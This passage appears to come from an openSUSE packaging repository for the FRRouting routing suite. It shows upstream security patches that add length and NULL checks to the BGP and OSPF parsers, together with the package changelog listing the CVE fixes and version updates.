treat-as-withdraw behavior for unknown (or missing to add - if new) attributes.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
(cherry picked from commit babb23b74855e23c987a63f8256d24e28c044d07)
---
bgpd/bgp_attr.c | 33 ++++++++++++++++++++++-----------
1 file changed, 22 insertions(+), 11 deletions(-)
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index 2e2845b8fa7e..7570598a3d7f 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1391,6 +1391,15 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
(args->startp - STREAM_DATA(BGP_INPUT(peer)))
+ args->total);
+ /* Partial optional attributes that are malformed should not cause
+ * the whole session to be reset. Instead treat it as a withdrawal
+ * of the routes, if possible.
+ */
+ if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) &&
+ CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) &&
+ CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL))
+ return BGP_ATTR_PARSE_WITHDRAW;
+
switch (args->type) {
/* where an attribute is relatively inconsequential, e.g. it does not
* affect route selection, and can be safely ignored, then any such
@@ -1425,19 +1434,21 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, subcode,
notify_datap, length);
return BGP_ATTR_PARSE_ERROR;
+ default:
+ /* Unknown attributes, that are handled by this function
+ * should be treated as withdraw, to prevent one more CVE
+ * from being introduced.
+ * RFC 7606 says:
+ * The "treat-as-withdraw" approach is generally preferred
+ * and the "session reset" approach is discouraged.
+ */
+ flog_err(EC_BGP_ATTR_FLAG,
+ "%s(%u) attribute received, while it is not known how to handle it, treating as withdraw",
+ lookup_msg(attr_str, args->type, NULL), args->type);
+ break;
}
- /* Partial optional attributes that are malformed should not cause
- * the whole session to be reset. Instead treat it as a withdrawal
- * of the routes, if possible.
- */
- if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS)
- && CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL)
- && CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL))
- return BGP_ATTR_PARSE_WITHDRAW;
-
- /* default to reset */
- return BGP_ATTR_PARSE_ERROR_NOTIFYPLS;
+ return BGP_ATTR_PARSE_WITHDRAW;
}
/* Find out what is wrong with the path attribute flag bits and log the error.

37
0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch Normal file
View File

@ -0,0 +1,37 @@
From 285c19a3c665087720e1fea7d8d944c961c52288 Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Mon, 26 Feb 2024 10:40:34 +0100
Subject: [PATCH] ospfd: Solved crash in OSPF TE parsing
Upstream: yes
References: bsc#1220548, CVE-2024-27913, gh#FRRouting/frr#15431
Iggy Frankovic discovered an ospfd crash when perfomring fuzzing of OSPF LSA
packets. The crash occurs in ospf_te_parse_te() function when attemping to
create corresponding egde from TE Link parameters. If there is no local
address, an edge is created but without any attributes. During parsing, the
function try to access to this attribute fields which has not been created
causing an ospfd crash.
The patch simply check if the te parser has found a valid local address. If not
found, we stop the parser which avoid the crash.
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 75f4e0c9f0..45eb205759 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2276,6 +2276,10 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
}
/* Get corresponding Edge from Link State Data Base */
+ if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
+ ote_debug(" |- Found no TE Link local address/ID. Abort!");
+ return -1;
+ }
edge = get_edge(ted, attr.adv, attr.standard.local);
old = edge->attributes;
--
2.35.3

67
0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch Normal file
View File

@ -0,0 +1,67 @@
From 298704f1e73221172432e2a4afd79086ffcd4cca Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Wed, 3 Apr 2024 16:28:23 +0200
Upstream: yes
References: CVE-2024-31950,bsc#1222526,gh#FRRouting/frr#16088
Subject: [PATCH 1/3] ospfd: Solved crash in RI parsing with OSPF TE
Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
LSA packets. The crash occurs in ospf_te_parse_ri() function when attemping to
read Segment Routing subTLVs. The original code doesn't check if the size of
the SR subTLVs have the correct length. In presence of erronous LSA, this will
cause a buffer overflow and ospfd crash.
This patch introduces new verification of the subTLVs size for Router
Information TLV.
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit f69d1313b19047d3d83fc2b36a518355b861dfc4)
---
ospfd/ospf_te.c | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 45eb205759..885b915585 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2483,6 +2483,9 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
switch (ntohs(tlvh->type)) {
case RI_SR_TLV_SR_ALGORITHM:
+ if (TLV_BODY_SIZE(tlvh) < 1 ||
+ TLV_BODY_SIZE(tlvh) > ALGORITHM_COUNT)
+ break;
algo = (struct ri_sr_tlv_sr_algorithm *)tlvh;
for (int i = 0; i < ntohs(algo->header.length); i++) {
@@ -2507,6 +2510,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_SRGB_LABEL_RANGE:
+ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
+ break;
range = (struct ri_sr_tlv_sid_label_range *)tlvh;
size = GET_RANGE_SIZE(ntohl(range->size));
lower = GET_LABEL(ntohl(range->lower.value));
@@ -2524,6 +2529,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_SRLB_LABEL_RANGE:
+ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
+ break;
range = (struct ri_sr_tlv_sid_label_range *)tlvh;
size = GET_RANGE_SIZE(ntohl(range->size));
lower = GET_LABEL(ntohl(range->lower.value));
@@ -2541,6 +2548,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case RI_SR_TLV_NODE_MSD:
+ if (TLV_BODY_SIZE(tlvh) < RI_SR_TLV_NODE_MSD_SIZE)
+ break;
msd = (struct ri_sr_tlv_node_msd *)tlvh;
if ((CHECK_FLAG(node->flags, LS_NODE_MSD))
&& (node->msd == msd->value))
--
2.35.3

109
0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch Normal file
View File

@ -0,0 +1,109 @@
From 4e70b09f24b72fbb27ff5eda63393bfd2a72ef37 Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Fri, 5 Apr 2024 12:57:11 +0200
Upstream: yes
References: CVE-2024-31951,bsc#1222528,gh#FRRouting/frr#16088
Subject: [PATCH 2/3] ospfd: Correct Opaque LSA Extended parser
Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
LSA packets. The crash occurs in ospf_te_parse_ext_link() function when
attemping to read Segment Routing Adjacency SID subTLVs. The original code
doesn't check if the size of the Extended Link TLVs and subTLVs have the correct
length. In presence of erronous LSA, this will cause a buffer overflow and ospfd
crashes.
This patch introduces new verification of the subTLVs size for Extended Link
TLVs and subTLVs. Similar check has been also introduced for the Extended
Prefix TLV.
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit 5557a289acdaeec8cc63ffc97b5c2abf6dee7b3a)
---
ospfd/ospf_te.c | 35 +++++++++++++++++++++++++++++++++--
1 file changed, 33 insertions(+), 2 deletions(-)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 885b915585..23a1b181ec 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -2647,6 +2647,7 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
struct ext_tlv_prefix *ext;
struct ext_subtlv_prefix_sid *pref_sid;
uint32_t label;
+ uint16_t len, size;
/* Get corresponding Subnet from Link State Data Base */
ext = (struct ext_tlv_prefix *)TLV_HDR_TOP(lsa->data);
@@ -2668,6 +2669,18 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
ote_debug(" |- Process Extended Prefix LSA %pI4 for subnet %pFX",
&lsa->data->id, &pref);
+ /*
+ * Check Extended Prefix TLV size against LSA size
+ * as only one TLV is allowed per LSA
+ */
+ len = TLV_BODY_SIZE(&ext->header);
+ size = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
+ if (len != size || len <= 0) {
+ ote_debug(" |- Wrong TLV size: %u instead of %u",
+ (uint32_t)len, (uint32_t)size);
+ return -1;
+ }
+
/* Initialize TLV browsing */
ls_pref = subnet->ls_pref;
pref_sid = (struct ext_subtlv_prefix_sid *)((char *)(ext) + TLV_HDR_SIZE
@@ -2778,8 +2791,20 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
&lsa->data->id, &edge->attributes->standard.local);
- /* Initialize TLV browsing */
- len = TLV_BODY_SIZE(&ext->header) - EXT_TLV_LINK_SIZE;
+ /*
+ * Check Extended Link TLV size against LSA size
+ * as only one TLV is allowed per LSA
+ */
+ len = TLV_BODY_SIZE(&ext->header);
+ i = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
+ if (len != i || len <= 0) {
+ ote_debug(" |- Wrong TLV size: %u instead of %u",
+ (uint32_t)len, (uint32_t)i);
+ return -1;
+ }
+
+ /* Initialize subTLVs browsing */
+ len -= EXT_TLV_LINK_SIZE;
tlvh = (struct tlv_header *)((char *)(ext) + TLV_HDR_SIZE
+ EXT_TLV_LINK_SIZE);
for (; sum < len; tlvh = TLV_HDR_NEXT(tlvh)) {
@@ -2789,6 +2814,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
switch (ntohs(tlvh->type)) {
case EXT_SUBTLV_ADJ_SID:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_ADJ_SID_SIZE)
+ break;
adj = (struct ext_subtlv_adj_sid *)tlvh;
label = CHECK_FLAG(adj->flags,
EXT_SUBTLV_LINK_ADJ_SID_VFLG)
@@ -2815,6 +2842,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case EXT_SUBTLV_LAN_ADJ_SID:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_LAN_ADJ_SID_SIZE)
+ break;
ladj = (struct ext_subtlv_lan_adj_sid *)tlvh;
label = CHECK_FLAG(ladj->flags,
EXT_SUBTLV_LINK_ADJ_SID_VFLG)
@@ -2844,6 +2873,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
break;
case EXT_SUBTLV_RMT_ITF_ADDR:
+ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_RMT_ITF_ADDR_SIZE)
+ break;
rmt = (struct ext_subtlv_rmt_itf_addr *)tlvh;
if (CHECK_FLAG(atr->flags, LS_ATTR_NEIGH_ADDR)
&& IPV4_ADDR_SAME(&atr->standard.remote,
--
2.35.3

82
0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch Normal file
View File

@ -0,0 +1,82 @@
From cef38442420aeac8e163f8aa55f1b985908f993c Mon Sep 17 00:00:00 2001
From: Olivier Dugeon <olivier.dugeon@orange.com>
Date: Tue, 16 Apr 2024 16:42:06 +0200
Upstream: yes
References: CVE-2024-34088,bsc#1223786,gh#FRRouting/frr#16088
Subject: [PATCH 3/3] ospfd: protect call to get_edge() in ospf_te.c
During fuzzing, Iggy Frankovic discovered that get_edge() function in ospf_te.c
could return null pointer, in particular when the link_id or advertised router
IP addresses are fuzzed. As the null pointer returned by get_edge() function is
not handlei by calling functions, this could cause ospfd crash.
This patch introduces new verification of returned pointer by get_edge()
function and stop the processing in case of null pointer. In addition, link ID
and advertiser router ID are validated before calling ls_find_edge_by_key() to
avoid the creation of a new edge with an invalid key.
CVE-2024-34088
Co-authored-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Olivier Dugeon <olivier.dugeon@orange.com>
(cherry picked from commit 8c177d69e32b91b45bda5fc5da6511fa03dc11ca)
---
ospfd/ospf_te.c | 19 ++++++++++++++++---
1 file changed, 16 insertions(+), 3 deletions(-)
diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
index 23a1b181ec..d1f114e30a 100644
--- a/ospfd/ospf_te.c
+++ b/ospfd/ospf_te.c
@@ -1686,6 +1686,11 @@ static struct ls_edge *get_edge(struct ls_ted *ted, struct ls_node_id adv,
struct ls_edge *edge;
struct ls_attributes *attr;
+ /* Check that Link ID and Node ID are valid */
+ if (IPV4_NET0(link_id.s_addr) || IPV4_NET0(adv.id.ip.addr.s_addr) ||
+ adv.origin != OSPFv2)
+ return NULL;
+
/* Search Edge that corresponds to the Link ID */
key = ((uint64_t)ntohl(link_id.s_addr)) & 0xffffffff;
edge = ls_find_edge_by_key(ted, key);
@@ -1758,6 +1763,10 @@ static void ospf_te_update_link(struct ls_ted *ted, struct ls_vertex *vertex,
/* Get Corresponding Edge from Link State Data Base */
edge = get_edge(ted, vertex->node->adv, link_data);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Link Data. Abort!");
+ return;
+ }
attr = edge->attributes;
/* re-attached edge to vertex if needed */
@@ -2276,11 +2285,11 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
}
/* Get corresponding Edge from Link State Data Base */
- if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
- ote_debug(" |- Found no TE Link local address/ID. Abort!");
+ edge = get_edge(ted, attr.adv, attr.standard.local);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Link local add./ID. Abort!");
return -1;
}
- edge = get_edge(ted, attr.adv, attr.standard.local);
old = edge->attributes;
ote_debug(" |- Process Traffic Engineering LSA %pI4 for Edge %pI4",
@@ -2786,6 +2795,10 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
lnid.id.ip.area_id = lsa->area->area_id;
ext = (struct ext_tlv_link *)TLV_HDR_TOP(lsa->data);
edge = get_edge(ted, lnid, ext->link_data);
+ if (!edge) {
+ ote_debug(" |- Found no edge from Extended Link Data. Abort!");
+ return -1;
+ }
atr = edge->attributes;
ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
--
2.35.3

BIN
frr-10.0.1.tar.gz (Stored with Git LFS) Normal file
View File

Binary file not shown.

3
frr-8.4.tar.gz Normal file
View File

@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:4fe5dccf6d41218c3012c2b09c85c4cd65a96299ab400e487191515232f0ee8a
size 9883194

1
frr-tmpfiles.d Normal file
View File

@ -0,0 +1 @@
d @frr_statedir@ 0751 frr frrvty

496
frr.changes Normal file
View File

@ -0,0 +1,496 @@
-------------------------------------------------------------------
Thu Aug 22 13:02:19 UTC 2024 - Marius Tomaschewski <mt@suse.com>
- fixed bug/pull request references in frr.changes file
-------------------------------------------------------------------
Thu Aug 22 13:02:19 UTC 2024 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for crash in bgp_attr_encap that were missing
a check of the actual remaining stream length before taking the
TLV value (CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502):
+ 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch
- Re-added 0001-disable-zmq-test.patch to avoid (sporadic or arch
specific, e.g. aarch64) "make check" test failures (bsc#1180217).
+ 0001-disable-zmq-test.patch
- Re-added hardening patch for systemd service(s) (bsc#1181400):
+ harden_frr.service.patch
- Cleanup unknown --enable-systemd and correct the --sysconfdir
and --localstatedir configure options to not end in …/frr.
-------------------------------------------------------------------
Fri Aug 9 14:14:10 UTC 2024 - Erico Mendonca <erico.mendonca@suse.com>
- Fixing Source URL/archive name.
-------------------------------------------------------------------
Sun Jul 28 20:21:43 UTC 2024 - Erico Mendonca <erico.mendonca@suse.com> - 10.0.1
- Update to version 10.0.1 from official sources.
- Clean slate: removing all previous patches.
- The following patches were obsoleted:
- 0001-disable-zmq-test.patch
- harden_frr.service.patch
- 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch
- 0004-tools-remove-backslash-from-declare-check-regex.patch
- 0005-root-ok-in-account-frr.pam.patch
- 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
- 0007-bgpd-Ensure-stream-received-has-enough-data.patch
- 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch
- 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
- 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch
- 0011-babeld-fix-11808-to-avoid-infinite-loops.patch
- 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
- 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
- 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
- 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
- 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
- 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
- 0018-bgpd-Flowspec-overflow-issue.patch
- 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
- 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch
- 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
- 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
- 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
-------------------------------------------------------------------
Tue Jun 4 21:27:48 UTC 2024 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix solving ospfd denial of service via get_edge()
function returning a NULL pointer (CVE-2024-34088,bsc#1223786,
gh#FRRouting/frr#16088).
[+ 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch]
- Apply upstream fix solving ospfd buffer overflow and daemon crash
in ospf_te_parse_ext_link for OSPF LSA packets during an attempt
to read Segment Routing Adjacency SID subTLVs (CVE-2024-31951,
bsc#1222528,gh#FRRouting/frr#16088).
[+ 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch]
- Apply upstream fix solving ospfd buffer overflow and daemon crash
in RI parsing with OSPF TE (CVE-2024-31950,bsc#1222526,
gh#FRRouting/frr#16088).
[+ 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch]
-------------------------------------------------------------------
Wed Apr 24 10:40:57 UTC 2024 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix solving crash in OSPF TE parsing (bsc#1220548,
CVE-2024-27913, gh#FRRouting/frr#15431)
[+ 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch]
-------------------------------------------------------------------
Wed Apr 10 18:59:00 UTC 2024 - Clemens Famulla-Conrad <cfamullaconrad@suse.com>
- add
0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch:
* Apply upstream fix on error handling when receiving BGP Prefix
SID attribute (bsc#1222518,CVE-2024-31948,gh#FRRouting/frr#15628)
-------------------------------------------------------------------
Thu Feb 8 06:55:28 UTC 2024 - Dominique Leuenberger <dimstar@opensuse.org>
- Provide user/group symbol for user created during pre.
-------------------------------------------------------------------
Fri Feb 2 08:25:36 UTC 2024 - Dominique Leuenberger <dimstar@opensuse.org>
- Fix build with RPM 4.19: a stray %-escape sequence was found in
the files section.
-------------------------------------------------------------------
Mon Dec 4 09:11:46 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for a crash on malformed BGP UPDATE message
with an EOR, because the presence of EOR does not lead to a
treat-as-withdraw outcome (CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b)
[+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch]
- Apply upstream fix for a crash on crafted BGP UPDATE message with
a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234,
bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf)
[+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch]
- Apply upstream fix for attempts to read beyond the end of the
stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f)
[+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch]
- Apply upstream fix for an nlri length of zero mishandling, aka
"flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3)
[+ 0018-bgpd-Flowspec-overflow-issue.patch]
-------------------------------------------------------------------
Mon Oct 30 12:38:21 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for a crash due to a crafted BGP UPDATE message
(CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4).
[+ 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch]
- Apply upstream fix for a crash due to mishandled malformed
MP_REACH_NLRI data (CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35).
[+ 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch]
-------------------------------------------------------------------
Tue Sep 12 13:40:19 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for NULL pointer dereference due to processing
of malformed requests with no attributes in bgp_nlri_parse_flowspec
(CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8).
[+ 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch]
-------------------------------------------------------------------
Wed Aug 30 17:15:35 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Removed protobuf-c BuildRequires (source package name) breaking
build-system setup with libprotobuf-c-devel 1.3.2 updates.
- Apply upstream fix for bgpd: Don't read initial byte of the ORF
header in an ahead-of-stream situation (CVE-2023-41360,
bsc#1214739,https://github.com/FRRouting/frr/pull/14245)
[+ 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch]
- Apply upstream fix for bgpd: Do not process NLRIs if the attribute
length is zero (CVE-2023-41358,bsc#1214735,
https://github.com/FRRouting/frr/pull/14260)
[+ 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch]
- Apply upstream fix bgpd: Use treat-as-withdraw for tunnel encapsulation
attribute instead of session reset (CVE-2023-38802,bsc#1213284,
https://github.com/FRRouting/frr/pull/14290)
[+ 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch]
- Apply upstream fix babeld: avoid infinite loops (CVE-2023-3748,bsc#1213434,
gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952)
[+ 0011-babeld-fix-11808-to-avoid-infinite-loops.patch]
-------------------------------------------------------------------
Mon May 15 08:01:39 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for denial of service via the bgp_capability_llgr()
function (bsc#1211248,CVE-2023-31489,gh#FRRouting/frr#13098).
[+ 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch]
- Apply upstream fix for denial of service via the bgp_attr_psid_sub()
function (bsc#1211249,CVE-2023-31490,gh#FRRouting/frr#13099).
[+ 0007-bgpd-Ensure-stream-received-has-enough-data.patch]
-------------------------------------------------------------------
Mon Apr 3 14:00:27 UTC 2023 - Marius Tomaschewski <mt@suse.com>
- Enable pim6d providing PIMv6 support (bsc#1206234)
-------------------------------------------------------------------
Fri Jan 13 12:27:58 UTC 2023 - Stefan Schubert <schubi@suse.com>
- Migration of PAM settings to /usr/lib/pam.d.
-------------------------------------------------------------------
Fri Nov 11 13:04:52 UTC 2022 - Marius Tomaschewski <mt@suse.com>
- Migration to /usr/etc: Conditionally moved /etc/logrotate.d/frr
file to vendor specific directory /usr/etc/logrotate.d and added
saving of user changed configuration files in /etc and restoring
them while an RPM update.
- Declare root as sufficient also in the pam account verification;
without vtysh use causes to log a pam frr:account warnings
(https://github.com/FRRouting/frr/pull/12308)
[+ 0005-root-ok-in-account-frr.pam.patch]
- Applied fix removing a not needed backslash causing to log a warning
(https://github.com/FRRouting/frr/pull/12307)
[+ 0004-tools-remove-backslash-from-declare-check-regex.patch]
- Applied upstream fixes for frrinit.sh to avoid a privilege escalation
from frr to root in frr config creation (bsc#1204124,CVE-2022-42917,
https://github.com/FRRouting/frr/pull/12157).
[+ 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch]
- Removed obsolete patches provided in the 8.4 source archive:
[- 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch,
- 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch,
- 0005-isisd-fix-router-capability-TLV-parsing-issues.patch,
- 0006-isisd-fix-10505-using-base64-encoding.patch,
- 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch,
- 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch]
- Update to version 8.4, see https://frrouting.org/release/8.4/
* New BGP command (neighbor PEER soo) to configure SoO to prevent
routing loops and suboptimal routing on dual-homed sites.
* Command debug bgp allow-martian replaced to bgp allow-martian-nexthop
because previously we allowed using martian next-hops when debug is
turned on.
* Implement BGP Prefix Origin Validation State Extended Community rfc8097
* Implement Route Leak Prevention and Detection Using Roles in UPDATE
and OPEN Messages rfc9234
* BMP L3VPN support
* PIMv6 support
* MLD support
* New command to enable using reserved IPv4 ranges as normal addresses
for BGP next-hops, interface addresses, etc.
* As usual, lots of bugs and memory leaks were fixed \m/
such as a fix for a possible use-after-free due to a race
condition related to bgp_notify_send_with_data() and
bgp_process_packet() in bgp_packet.c. This could lead to
Remote Code Execution or Information Disclosure by sending
crafted BGP packets (CVE-2022-37035,bsc#1202085).
- Update to version 8.3, see https://frrouting.org/release/8.3/
* Notification Message support for BGP Graceful Restart
* BGP Cease Notification Subcode For BFD
* Send Hold Timer for BGP
* RFC5424 syslog support
* PIM passive command
- Update to version 8.2.2, see https://frrouting.org/release/8.2.2/
* BGP Long-lived graceful restart capability
* BGP Extended Optional Parameters Length for BGP OPEN Message
* BGP Extended BGP Administrative Shutdown Communication
* IS-IS Link State Traffic Engineering support
* OSPFv3 Support for NSSA Type-7 address ranges
* PBR VLAN actions support
-------------------------------------------------------------------
Mon Sep 5 11:48:25 UTC 2022 - Marius Tomaschewski <mt@suse.com>
- Apply upstream fix for out-of-bounds read in the BGP daemon
that may lead to information disclosure or denial of service
(bsc#1202023,CVE-2022-37032)
[+ 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch]
- Apply upstream fix for a memory leak in the IS-IS daemon that
may lead to server memory exhaustion (bsc#1202022,CVE-2019-25074)
[+ 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch]
-------------------------------------------------------------------
Thu Mar 17 11:45:00 UTC 2022 - Dominique Leuenberger <dimstar@opensuse.org>
- Make build a bit cheaper: do only BuildRequire the primary python
interpreter and its modules (python3-FOO) instead of all
available versions as done using %{python_module FOO}
-------------------------------------------------------------------
Mon Feb 28 11:05:48 UTC 2022 - Marius Tomaschewski <mt@suse.com>
- Apply fix for a buffer overflow in isisd due to the use of strdup
with a non-zero-terminated binary string (bsc#1196506,CVE-2022-26126)
[+ 0006-isisd-fix-10505-using-base64-encoding.patch]
- Apply fix for a buffer overflow in isisd due to wrong checks on
the input packet length (bsc#1196505,CVE-2022-26125) with workaround
for the GIT binary patch to tests/isisd/test_fuzz_isis_tlv_tests.h.gz
[+ 0005-isisd-fix-router-capability-TLV-parsing-issues.patch]
- Apply fix for a buffer overflow in babeld due to wrong checks on
the input packet length in the packet_examin and subtlv parsing
(bsc#1196504,bsc#1196507,CVE-2022-26128,CVE-2022-26129)
[+ 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch]
- Apply fix for a heap buffer overflow in babeld due to missing check
on the input packet length (bsc#1196503,CVE-2022-26127)
[+ 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch]
-------------------------------------------------------------------
Thu Dec 9 08:40:11 UTC 2021 - Johannes Segitz <jsegitz@suse.com>
- Add ReadWritePaths=/etc/frr to harden_frr.service.patch (bsc#1181400).
-------------------------------------------------------------------
Wed Nov 17 05:48:12 UTC 2021 - Linnaea Lavia <linnaea@lavia.moe>
- Update to version 8.1
* Graceful Restart for OSPFv2 and OSPFv3
* OSPFv3 NSSA and NSSA-TSA support
* OSPFv3 ASBR Summarisation Support
* BGP SRv6 and Prefix-SID Type 5 improvements
* BGP EVPN type-5 gateway IP overlay Index
* Lua hook support
* See: https://frrouting.org/release/8.1/
-------------------------------------------------------------------
